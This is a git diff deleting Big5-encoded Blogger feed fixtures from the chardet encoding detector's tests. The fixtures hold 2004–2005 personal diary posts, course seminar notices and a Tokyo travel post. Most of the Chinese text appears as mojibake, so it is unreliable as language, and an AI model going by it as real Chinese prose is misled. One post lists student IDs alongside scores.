    ³o­׃¥@¶¡±`±`¬O¥»¨׃¨S¦³¨ֶ¡A¦‎´N¦]¬°¦³₪@¨ַ₪H¦h÷¶¢¨ֶ¡A¦]¦¹·S¥X³\¦h×÷¬O«D¨׃¡C«¦h®ֹ­װ¡A¥u­n§­ּ₪£­n¦h₪¡A´N₪°»ע¨ֶ₪]¨S¦³¡A¦‎¬O§­ּ±`±`§ג«¦µM×÷¨ֶ¡A·Q±o₪׃¦h¡Aµe³D²K¨¬¡A¦]¦¹¬ד¨s±o₪׃²`¡A₪ֿ¦׃₪£¥¿±`¡C
    26 Dec 04
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T21:48:00+08:00 -2005-12-25T13:53:29Z -2005-11-10T15:17:28Z - -tag:blogger.com,1999:blog-5945336.post-113163584819318938 -«¦h - -
    - - - -
    ₪S¼W₪@¦¨­₪F¡A¬O¶ך¶ך°e¨׃×÷¯¬÷ײ¡C₪@¹ן₪₪¡A«¬O¥i·R¡C
    -
    »¡§A×¾¡A§¦n³ֵw¦³¥d³q×÷ֵר₪l¡A¥־¨׃¦¬ֲֳ₪p׫¥ף¬O³ּ¦n₪£¹L×÷¡C
    ******************************
    - - -₪@­׃₪H«o¦³³o»ע¦h°¦×M¡]¥u©ח₪Usnoopy ×÷´¦¡¡^¡C¥‏¬O×B₪ֽ°e×÷¡A¶ְ¦ג¨÷₪@°¦₪w¸g₪£°O±o¬O½ײ°eµ¹§¡C
    -
    ¥ׁ¥×¦¥k¡A¥¦­ּ¨׃¦·s¥[©Y¡A₪£°O±o¡]₪£¬O¼w°ך´N¬O·s¥[©Y¡^¡A­»´ה¡]©ג¼ת±o¨׃×÷¡^¡A¼w°ך©M₪י¥»¡]¦~¬צ³ּ₪j¡^¡C
    10 Nov 05
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T21:14:00+08:00 -2005-12-25T13:34:28Z -2005-12-25T13:18:10Z - -tag:blogger.com,1999:blog-5945336.post-113551669000115501 -§×÷©@°״ - -
    «₪[«₪[¡A¨S¦³³µ©@°״¶¢½ֽ₪F¡C©@°״¦³³¡A¬O¨C₪ׁ¦­₪W¦סµ§₪u§@×÷¶¼®ֶ¡C³ּ¦n³×÷©@°״¡A·םµM¬O©M¥i¥H½ֽ₪¸ּ¸×÷₪H₪@°_³¡C³ּ¦n×÷¡A¬O§₪¦b·ֵ·x×÷₪׃¶§©³₪U«~¹ֱ₪@₪f¦X§₪·N×÷·x¶¼¡C
    -
    ¨ה¹ך₪£»­n³©@°״¡A³×ב¯ש₪]¥i¥H×÷¡C³₪°»ע₪£­«­n¡A¦׃¬O¯u×÷¥i¥H¥ז₪¡C
    -
    ²{¦b·Q°_×÷¬O¦b»OֶW®ֹ¦b₪K¨½×÷₪@¹y¶~¶÷¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T21:00:00+08:00 -2005-12-25T13:05:01Z -2005-12-25T06:01:45Z - -tag:blogger.com,1999:blog-5945336.post-113549050573498401 -¸t½ֿ₪י - -
    ·|©M®a₪H¦Y¶÷¡A­q₪F³½¥ֽ¹״¥q§@₪µ±×÷±ְ\¡C¦n©¯¹B°¡I¿ן₪F×÷¨ה₪₪¨ג÷״³½¥ֽ¡A©~µM¦³¥b»ש×÷ְu´f¡]ֱ¶R¨ה¥L×÷³½¥ֽ¹״¥q¨ל¬Y₪@­׃×קֳB¡^¡C
    -
    ¨ה¥L×÷­¹×«¡A±₪@ֲI¦A¶R¡C
    -
    §­ּ×÷ְ\³ז¡A°£₪F¥H₪W×÷¡Aֱ¦³³Dֳ¼¡Bִz¦ּ¶÷¡Bֱ¡»ז®Mְ\©M¦ט¬vµז´צ¡C₪₪¡B¦ט©M₪י¦X«ק×÷₪@ְ\¡C
    -
    ×ס¨ג₪ׁ¡A¦Y₪F³o»ע¦h×F¦ט¡A²{¦bµ¹§·Pִ±³ּ¦n×÷´N¬O²M₪פ¡C©ת±¡Aֲ²³ז×÷±ְ\¥i¥H₪F¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T16:21:00+08:00 -2005-12-25T08:23:41Z -2005-12-25T08:23:41Z - -tag:blogger.com,1999:blog-5945336.post-113549902115226636 -¦¨¼פ₪£¦¨¼פ - -
    ¬Q₪ׁ§­ּ½ֽ½׳₪k«ִ₪l×÷₪f₪£¹ן₪¡A¨k₪h»¡¥i¥H´Nµ¥H©¹×÷¥h®»÷N₪k«ִ₪l×÷₪¡C§­ּ₪k«ִ₪l»¡¬O₪£¥i¥H×÷¡A¦]¬°₪k«ִ₪l¦₪v₪]₪£×¾¹D¦ף®ֹ§­ּ×÷₪¬O₪£¹ן₪f×÷¡C
    -
    ¨ה¹ך®¥»₪£»­n²q¨׃²q¥h¡A¦p×G₪k«ִ₪l·Q¥־₪f₪£¹ן₪¨׃´ת¸ױ¨k«ִ¹ן¦o×÷·R¡A¨­W×÷¬O¨ג­׃₪H¡C¨k«ִ²q₪£µ¡A₪k«ִ·|₪£°×¿³¡A¨÷»ע²q×÷·N¸q¦ף¦b¡H
    -
    §¥H₪W©ׂ»¡×÷·םµM¬O¦¨¼פ×÷×ם²{¡C₪£¹L₪@­׃₪k©¡A´N÷ג¬O₪´¼«¦¨¼פ×÷¡A¦b±¡·R¸ּ­±³£¦³₪p₪k«ִ×÷×ם²{¡C³o¬O«¥¿±`×÷°¡I
    -
    ¨÷»ע¨k×÷«ח¿ל¦n©O¡H¨ה¹ך®¥»₪£»­n₪¶·N¡A§A¦×¾¹D«ח¼ֻ¥h³B²z×÷¡A¦p×G§A₪]¬O¦¨¼פ×÷₪H¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T14:20:00+08:00 -2005-12-25T06:22:53Z -2005-12-25T06:22:53Z - -tag:blogger.com,1999:blog-5945336.post-113549177393416835 -₪׃¨אְ¸₪F - - - -false - - - - -San Wen Ji - -2005-12-25T12:13:00+08:00 -2005-12-25T06:06:56Z -2005-12-25T04:20:15Z - -tag:blogger.com,1999:blog-5945336.post-113548441568925300 -₪[¹H₪F - -
    - - - - - - - -
    - - - - - - - -
    -
    ¦Y×÷ֲ²³ז¡A×±₪]×±±oֲ²³ז¡Cֲ²³ז₪₪×÷§ײ¼ײ¡A¬O­n§­ּ×÷°ׁ»P¡A¨ֳ₪£¬O³ז³ז¥־×ק¿ת´«¦^¨׃×÷×F¦ט¡C¯א§_¦bֲ²³ז₪₪´M¼ײ½ל¡A¬§­ּ¹ן¼ײ½ל×÷÷tֳ¶₪F¡C¦U₪H¦¦³¦U₪H₪£¦P×÷¬×k¡C«ח¼ֻ₪]¦n¡A¯א°ק§ײ¼ײ´N¦n¡C
    -
    §­ּ₪]×±₪F×ֵ₪₪¼g¦r¡A½׀¬₪j¶¯©ׂ©ח×÷·׃₪ש¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T11:38:00+08:00 -2005-12-25T04:09:41Z -2005-12-25T03:41:38Z - -tag:blogger.com,1999:blog-5945336.post-113548209847956186 -©ח±o₪£¦n×÷©]´÷ - -
    - - -¬₪ש©ח±o₪£¦n¡A¦^¾׀«o¬O­«­n¡C©M´X¦ל₪ֽ₪H¡A¹L₪F₪@­׃¥­ְR×÷¥­¦w©]¡C§A­ּ²q₪]²q₪£¨ל¡A§­ּ×÷¥­¦w©]₪jְ\©~µM¬O§Y­¹ִׁ¡C
    -
    ₪י¥ת®ֹ¶¡¡A§­ּ¦Y±o«¹¡₪]«ֲ׳´I¡A©ׂ¥H±₪W·Q¦Y±oֲ²³ז₪@ֲI¡C¦³ֳצ¬₪ש¡A¬¥V¥V©ח×÷¡C¨÷¨ַ®ֲA¡A¦Y×÷®ֹ­װֱ±aµ®₪פ×÷¨‎¹D¡A¦n¦Y¡I₪£¹L₪£´±¦Y±o₪׃¦h¡A²L¹ֱ₪@ֲI´N¦n¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T11:24:00+08:00 -2005-12-25T03:34:15Z -2005-12-25T03:31:08Z - -tag:blogger.com,1999:blog-5945336.post-113548146814876169 -³J³J - -
    - - -³J³J¬O¶ך¶ך°e×÷¡A¬OµL§ׁ§¡C¥»₪כ₪»₪י₪w¸g¶}©l®ג÷״¡A©l²׳³£¬₪£¨ל₪°»ע×÷µo×µ²×G¡C
    - - -©ף¬O§ג³J³J§ֻ¯}₪F¡A¬¨ל₪F³o­׃¡C­ל¨׃÷״₪l¦b¦¨×ר₪₪¡Aֱ₪£¿ש×÷¡C§ף₪£×¾¹D×ב×÷÷״₪l¬O³o¯כ×÷¡C
    -
    ²{¦b÷״₪l¨S¦³₪F×d₪g¡A₪£×¾¹Dֱ·|ִ~ִע¥ֽ×ר¡H¥t¡A¥H¬°¨S¦³µo¥ֽ¡A­ל¨׃₪w¸gְRְR¦a°_₪Fֵ₪ֶ¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-25T02:02:00+08:00 -2005-12-24T18:03:54Z -2005-12-24T18:03:54Z - -tag:blogger.com,1999:blog-5945336.post-113544743453678852 -¸t½ֿ§ײ¼ײ - -
    §A×÷¸t½ֿ§ײ¼ײ₪£§ײ¼ײ¡H
    -
    ֱֱֲֲ°e§ֲ§×«×÷₪ֽ₪H¡C§¦nֳi¡A¨S¦³·ַ³ֲֶ§×«µ¹§A­ּ°¡I
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T21:31:00+08:00 -2005-12-23T13:39:13Z -2005-12-23T13:34:53Z - -tag:blogger.com,1999:blog-5945336.post-113534489355820203 -₪£¦n¶ֳ¦Y - - - -false - - - - -San Wen Ji - -2005-12-23T21:13:00+08:00 -2005-12-23T13:19:08Z -2005-12-23T13:15:35Z - -tag:blogger.com,1999:blog-5945336.post-113534373548625222 -¥H¬r§נ¬r - -
    ¬³o½g¡§¥H§N¨מ§N¡¨¡A­ל¨׃§±`»¡×÷¥H¬r§נ¬r¬O¹ן×÷¡C₪ו³¹₪₪´£¨ל×÷₪T­׃₪ט×k¡A§¥־₪F¨ג­׃¡A®ִ×G«¦n°¡I§N₪פ¬~ֱy©M¦b¥V₪י¸ּ§@₪ב¥~¹B°¡A₪w¸g¬O¦n´X¦~×÷²÷D₪F¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T21:01:00+08:00 -2005-12-23T13:03:27Z -2005-12-23T13:03:27Z - -tag:blogger.com,1999:blog-5945336.post-113534300705585536 -÷G - -
    ֵU°¶µ¥״¸ּ¡A¦ֱׁף³s½ײ¬O½ײ³£₪£²M·¡¡Aֳר©ַ§­n©t­x§@¾װ¡C÷G¡I
    -
    ©¯¦n¡A°¨°ך¦P¨ְֶ´±o¦V§¥´©©I¡A§«·s¨׃×÷¸g²z©M₪₪₪¸g²z¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T20:35:00+08:00 -2005-12-23T12:40:04Z -2005-12-23T12:40:04Z - -tag:blogger.com,1999:blog-5945336.post-113534160453925577 -©ת₪ׁ­n¦Y§A­ּ₪F - -
    - - - -
    ¨S¦³¶R₪p¬ץ¸z¡C½ז×F¦ט×÷שj»¡¥L­ּ₪£½ז₪p¬ץ¸z¡A¦o§i¶D§₪p¬ץ¸z¬O₪j³°¨׃×÷¡C¦n¹³·t¥§₪£­n¦Y¡A©ׂ¥H¨S¦³¶R₪F¡C
    -
    ¥ױ³½³J¡A¹ן₪£°_¡I§¨ֳ¥¼¯א§ג§A©ח¶i·׃₪ש¸ּ¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T12:28:00+08:00 -2005-12-23T04:29:45Z -2005-12-23T04:29:45Z - -tag:blogger.com,1999:blog-5945336.post-113531218576378209 -¥¼¯א·¾³q - -
    ¬O§_¥X®u·|ִ³¡M¬O¬¥X®u×ּ×÷°^ִm©־¦§±oµ¡C¦p×G¦³₪H»¡¥L₪£¥X®u§₪]₪£¥X®u×÷¸¡M¨÷»ע¬O§_¥X®u·|ִ³₪w¸g₪£¬O₪@­׃¦ׂ¼{¡C
    -
    §­ּ₪£¬O¦b×±¹Cְ¸¡M§­ּ¬O¦b₪u§@¡Cµ¹§¸¬°¦¨¼פ×÷×ם²{¦n¶¡S
    -
    ¼g³o¨ַ¡M₪£¬O§כ¶D₪°»ע¡M¦]¬°§₪w¸g©ס±ף₪F¸ע¶i¡C¼g³o¨ַ¡M¥u¬O·Q₪ה«ש¦₪v×÷¬×k¡M¦₪v×÷§Pֲ_¡M¦₪v×÷¨M©w¡C¦^ֵU¦₪v×÷«ה¦ׂ¡M₪]¬O₪@÷״¥ֽ©R×÷¾תµ{¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T12:19:00+08:00 -2005-12-23T04:20:15Z -2005-12-23T04:20:15Z - -tag:blogger.com,1999:blog-5945336.post-113531161571746109 -ֲ§×« - -
    ₪µ₪ׁ¦¬₪F₪@¥ק¸t½ֲֿ§×«¡M¬O₪@­׃¾v§¨¡M¦¡¼ֻ¥i¥H¡M¦‎¬O§¨ֳ₪£¯א¥־₪W¡C¦]¬°§×÷ְY¾v₪׃¦h¡M¾v§¨₪׃₪p¡C
    -
    ±o׫µL©ׂ¥־¡M¬O₪@­׃­ל¦]§₪£³ֵw¦¬ֲ§×«¡Cµ¹§₪@­׃₪£¬O׫½ט×÷₪·N«K«¨¬°ק¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T11:43:00+08:00 -2005-12-23T03:54:52Z -2005-12-23T03:52:36Z - -tag:blogger.com,1999:blog-5945336.post-113530995614452017 -ֵיֵח - -
    -
    Experience is not what happens to you; it¡¦s what you do with what happens to you.
    -
    ¸gֵח¨ֳ«Dµo¥ֽ¦b§A¨­₪W×÷¨ֶ±¡¦׃¬O§A¦p¦ף³B²z³o¨ַ¨ֶ±¡
    -
    by Aldous Huxley
    -
    ¦r²´₪W¡M§³ֵwֵיֵח¦h₪_¸gֵח¡M₪£¹Lֱ³ֵw¥H₪W×÷¥y₪l¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T10:17:00+08:00 -2005-12-23T02:28:49Z -2005-12-23T02:28:49Z - -tag:blogger.com,1999:blog-5945336.post-113530492958983086 -¯u±¡ - -
    cm ¼g³o½g¥O§²£¥ֽ¦@»ן¡C§¬±¡´N¬O³o¼ֻ₪F¡M¨S¦³­p÷ג¨S¦³²q·Q¡M₪°»ע₪]¬O¯u×÷¡C·ם°²×÷·Pִ±¥X²{®ֹ¡M¬O¨÷₪@¨ט¡M±¡¶}©lֵ½ט₪F¡C¥H©¹×÷¡Mֱ¬O¯u×÷¡C
    -
    ²q²q·Q·Q¡M¥O₪H²ײ¡C¦p×G³Q§¹Jµ³o¼ֻ×÷±¡¡M§·|§ײ§ײ¦a§ג¥¦²׳µ²¡M§₪£·Q®צ¶O§·P¨¯u·Pִ±×÷®ֹ¶¡¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T10:00:00+08:00 -2005-12-23T02:02:34Z -2005-12-23T02:01:27Z - -tag:blogger.com,1999:blog-5945336.post-113530328792708927 -¦³ֲIµL²ב - -
    ₪£×¾¬°₪°»ע¡M¬µ±µ₪G³s₪T×÷¸t½ֿ®¥¶P¹q¶l¡M·Pִ±ֱ`¬OµL²ב¡C¥H©¹³£·|§ג¥¦­ּ¥´¶}¨׃¬¬¡M₪µ¦~§§ג¥¦­ּ¥‏©¨ל¹q₪l©U§£½c¸ּ¥h₪F¡M₪]ֳi±o¬¡C
    -
    -false -
    - - - -San Wen Ji - -2005-12-23T09:51:00+08:00 -2005-12-23T01:52:18Z -2005-12-23T01:52:18Z - -tag:blogger.com,1999:blog-5945336.post-113530273891670233 -¿פ¯« - -
    ¬Q±§ג¡§§×÷®ֲׁN¡¨©M¡§§×÷­ץ¾ַ¦¨×ר¸פ¡¨§ף·s₪F¡C°µ×÷ֱצµM₪£¦h¡M¥i¬O·Pִ±«¦n¡Cִ©ף¦₪v×÷×F¦ט¡M¨S¦³²z·|¥¦­ּ¦h®ֹ¡Mֱ`¦³¨ַ₪ם¯¡C¼g₪F·¾³q¹L¡M₪¸ּ÷¡÷¡×÷¡C
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/sinica.edu.tw.xml b/chardet/tests/Big5/sinica.edu.tw.xml deleted file mode 100644 index 5fad970..0000000 --- a/chardet/tests/Big5/sinica.edu.tw.xml +++ /dev/null @@ -1,250 +0,0 @@ - - - - - - -¡uְH¾ק³¡¸¨®ז¡v₪§¡u½u₪W÷t÷ג×k¡v - - -tag:blogger.com,1999:blog-7865778 -2005-10-09T14:24:12Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    -true - - - -ְH¾ק«ָ - -2005-02-02T03:45:25+08:00 -2005-02-01T19:49:25Z -2005-02-01T19:49:25Z - -tag:blogger.com,1999:blog-7865778.post-110728736545344025 -·s¦~§ײ¼ײ - -
    ¾ַ¸¹ ¾ַ´ֱ¦¨ֱZ -
    B90902123 99 -
    R93922004 99 -
    B93902105 98 -
    R92922004 97 -
    R92922059 97 -
    R93921026 97 -
    R93922023 97 -
    R93922028 97 -
    R93922057 97 -
    B90901130 96 -
    B90902067 96 -
    R92921088 96 -
    R93921024 96 -
    R93921034 96 -
    R93922003 96 -
    F89921035 95 -
    F92921029 95 -
    R93922069 95 -
    D88526014 93 -
    R92922089 93 -
    R93922022 93 -
    R93922040 92 -
    F91921025 91 -
    R92921077 91 -
    R92921097 91 -
    R93921023 91 -
    R93921093 91 -
    R93921107 90 -
    R93922049 90 -
    R93922130 90 -
    B90902100 89 -
    R93922037 88 -
    D91921011 87 -
    D93922007 87 -
    F90921070 87 -
    R92922113 87 -
    R93921036 87 -
    R92922123 87 -
    D91922010 86 -
    B91902038 85 -
    R93922021 85 -
    R93922062 85 -
    R92921078 84 -
    R92922055 84 -
    R93921029 84 -
    F90942056 83 -
    F92921102 83 -
    R93922046 83 -
    R93922136 82 -
    Q90921009 81 -
    D91922015 80 -
    R92921084 80 -
    R92922020 80 -
    R93922106 80 -
    R93922121 80 -
    F90921015 79 -
    R92921083 79 -
    F92922087 78 -
    R92922100 77 -
    B91902072 77 -
    R93944022 77 -
    D91922003 76 -
    R93922066 76 -
    R92922044 75 -
    P92921002 74 -
    B91501068 73 -
    D92921016 72 -
    R93922114 70 -
    R93922090 70 -
    R92921103 70 -
    R93922137 70 -
    R93922104 70 -
    R93922131 70 -
    -
    average 85.9 -
    -
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-07T22:54:30+08:00 -2005-01-07T14:58:30Z -2005-01-07T14:58:30Z - -tag:blogger.com,1999:blog-7865778.post-110510991009291520 -¡u°עֲ¦²z½׳±K½X¾ַ¡v³¡¸¨®ז¶}±i - -
    µo²{₪U¾ַ´ֱ×÷½ׂµ{×ל¿ן₪w¸g¶}©l, »°¦£´ְ¡u°עֲ¦²z½׳±K½X¾ַ¡v°µ₪F­׃³¡¸¨®ז¡A©ס¦b -
    -
    http://www.sinica.edu.tw/~hil/crypto/ -
    -
    ֵw×ן₪j¹¨א₪U¾ַ´ֱ¸ע¡uְH¾ק«ָ¡v₪@°_¾ַGoldreich×÷²ִ₪G¥U!
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-06T22:39:24+08:00 -2005-01-08T08:40:24Z -2005-01-06T14:45:39Z - -tag:blogger.com,1999:blog-7865778.post-110502273936942518 -´ֱ¥½³ר§i -- §d©ר¹F, ¯־÷ֽ§ - -
    Paper: Maciej Li?skiewicz, Bodo Manthey, "New lower and upper bounds for the competitive ratio of transmission protocols", Information Processing Letter, 89:297-301, 2004. -
    -
    Time: 1:00pm-2:30pm, Monday, Jan. 10, 2005 -
    -
    Place: Room 211, Bo-Li Building, EE, NTU -
    -
    Slides: group8.ppt -
    -
    ֵw×ן°ׁ¥[
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-06T13:32:12+08:00 -2005-01-06T05:33:12Z -2005-01-06T05:33:12Z - -tag:blogger.com,1999:blog-7865778.post-110498959298527512 -²ִ₪Q¥|¶g×÷§כ¼v₪ש - -
    ¦b³o¸ּ¡C ³o¬O³ּ«ב₪@¦¸₪W½ֵׂo!
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-04T01:14:56+08:00 -2005-01-08T08:40:56Z -2005-01-03T17:15:36Z - -tag:blogger.com,1999:blog-7865778.post-110477253614339220 -´ֱ¥½³ר§i -- ¿½¸t¿o, °×¯E₪¯, ½²µ¾¦t - -
    Improved Competitive Algorithms for Online -
    Scheduling with Partial Job Values -
    -
    T. Warnow and B. Zhu (Eds.): COCOON 2003, LNCS 2697, pp. 425¡V434, 2003. -
    Springer- Berlin Heidelberg 2003 -
    -
    Time: 2:00-3:30pm, Jan 8, 2005 -
    -
    Place: Room 454, EE 2nd building, NTU -
    -
    Slides: group7.ppt -
    -
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-03T08:50:28+08:00 -2005-01-08T08:41:28Z -2005-01-03T00:53:58Z - -tag:blogger.com,1999:blog-7865778.post-110471363859739519 -´ֱ¥½³ר§i -- ®}×צµY, ֱֲ¦W³ֽ - -
    Ramgopal R. Mettu, C. Greg Plaxton: "The Online Median Problem", SIAM Journal on Computing 32(3): 816-832, 2003. -
    -
    Time: 2:30-4:00pm, Jan 7, 2005 -
    -
    Place: Room 340, CSIE, NTU -
    -
    Slides: group6.ppt -
    -
    -
    -false -
    - - - -ְH¾ק«ָ - -2005-01-03T08:44:30+08:00 -2005-01-09T13:37:30Z -2005-01-03T00:49:50Z - -tag:blogger.com,1999:blog-7865778.post-110471339004678638 -´ֱ¥½³ר§i -- ±i®ּ÷, ³¯·״©v - -
    Avrim Blum and Jason Hartline, "Near-Optimal Online Auctions", SODA 2005. -
    -
    Time: 10:00-11:30AM, Jan 7, 2005 -
    -
    Place: Room 340, CSIE, NTU -
    -
    Slides: group5.ppt -
    -
    -
    -
    -false -
    -
    diff --git a/chardet/tests/Big5/sylvia1976.blogspot.com.xml b/chardet/tests/Big5/sylvia1976.blogspot.com.xml deleted file mode 100644 index 7fb486f..0000000 --- a/chardet/tests/Big5/sylvia1976.blogspot.com.xml +++ /dev/null @@ -1,45 +0,0 @@ - - - - - - -Be Strong -Wanna be strong. Have to be strong. So, be strong. - -tag:blogger.com,1999:blog-8966767 -2004-12-27T18:36:10Z -Blogger - -
    This is an Atom formatted XML site feed. It is intended to be viewed in a Newsreader or syndicated to another site. Please visit the Blogger Help for more info.
    -
    - - - -Sylvia1976 - -2004-12-22T23:34:10+08:00 -2004-12-27T18:36:10Z -2004-12-27T18:24:50Z - -tag:blogger.com,1999:blog-8966767.post-110417189089101897 -Tokyo Xmas...Day4 Afternoon -₪₪ֱI¦x´ע«¬¡A§¨ל×÷®ֹ­װ₪w¬O¶ְ©®ֹ¶¡¡A¾ד­׃₪₪ֱI¦x´ע©M©P³ע×÷¸s₪s¡Aֱ¦³₪G¯מ₪s(§ֳh÷ֳ¨÷₪]¬O₪@®y₪ץ₪s)¥‏³£ֵx÷¡×ק¶ְ×÷¶§¥ת¡A×u³~¥u¦³§₪@­׃₪H¡A©M°¸¦׃¸g¹L×÷¨T¨®¡Aֵ¥µ´ע₪פ³W«¦a©ח¥´©₪ֳה¡A¹חְR¦w²»¡A¬₪£³׃¦¬¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0078.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0078.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0080.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0080.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0082.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0082.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0085.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0085.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0087.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0087.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0088.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0088.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0089.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0089.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0097.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0097.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0099.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0099.jpg'></a><br />§¥»¨׃·Q₪@¸פ¨«¨ל₪₪ֱI¦x©־¬O¥₪לֶ[­µ¡A¦‎¬O©ח·׃×ב±¼³\¦h®ֹ¶¡¡A¥[₪W®ֹ¶¡¶V±®נ·ֵ¶V§C¡A³ּ«ב³÷µM₪]¹s¹s¬P¬Pִֶ₪U³·×ב¨׃¡I¥u¦n¥h·f4¡G45×÷₪₪h¦^Turtle Inn¡C<br />¦^¨לTurtle Inn®ֱֹ¨S¨ל±ְ\®ֹ¶¡¡A©ׂ¥H¥‎±a₪j®aֲ²³ז°ֶׁ[₪@₪U³o­׃÷כ½o¬ִR×÷₪p¥ֱ±Jֵo¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0107.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0107.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0108.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0108.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0109.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0109.jpg'></a><br />³o¬OTurtle Inn×÷¥~ֶ[¡A¦b´H§N×÷¥V©]¸ּ¡A·ֵ·x¦a×ן±µ®ָ₪H¨ל¨׃¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0110.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0110.1.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0111.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0111.jpg'></a><br />Turtle Inn×÷©׀¶¡¬O¥H₪Q₪G­׃₪כ°µ¬°©׀¶¡¸¹½X¡A³o¬O§₪µ±¦ם×÷"8₪כ(August)"¡A¶W¼e´¯¡IֱצµM¨S¦³¿W¥×÷½ֳ¯D¡A¦‎¥L­ּ¦³¨ג¶¡¦@¥־×÷₪י«ַ­·§f¡A¦׃¥B₪@±¥u­n4,300Yen¡A§­׃₪Hִ±±o¬O׫¶W©ׂ­ָ°ױ¡I©׀¶¡¸ֱּ¦³¥i·R×÷₪pֲ\¹¢³ב¡I<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0113.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0113.1.jpg'></a><br />³o¬O₪G¼׃×÷₪½¦@´Z©ׂ¡A«D±`¦a°®²bµ־¾A(¨ה¹ך¾ד­׃Turtle Inn³£¬O)¡A¦׃¥B¡Aֱ¦³·ֵ·x×÷°¨±ם³ב¡I´N¬O§₪¹װ·|¦°¥[¼צ×÷¨÷÷״...¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0114.3.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0114.3.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0115.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0115.1.jpg'></a><br />³o¬O₪@¼׃×÷₪½¦@¥נ¾ֽ°ֿ¡A³ֶ¦³¹q¸£¥i¥H₪W÷פ¡A¦‎₪£¥©×÷¬O³o´X₪ׁ­ט¦n¹q¸£¥X₪F°ֳD¡AµL×k₪W÷פ¡A¬¦ֱׁף®Q₪@ֱy÷p·N¡A₪]´N₪£­p¸₪F¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0120.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0120.jpg'></a><br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0122.1.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' src='http://photos1.blogger.com/img/19/2235/320/DSCF0122.1.jpg'></a><br />²׳©ףµ¥¨ל±ְ\®ֹ¶¡¡A₪µ₪ׁTurtle Inn×÷₪י¦¡±ְ\¡A¬O¹״³ֱח¡A·f°t₪י¦¡¨F©װ¡A₪@±ר¯N³½¡A₪@½L₪pµז¡B¨‎¼W´צ₪־¥ױ¶÷¡C<br /><a href='http://photos1.blogger.com/img/19/2235/320/DSCF0116.jpg'><img border='0' style='border:2px solid #AAAAAA; margin:2px' 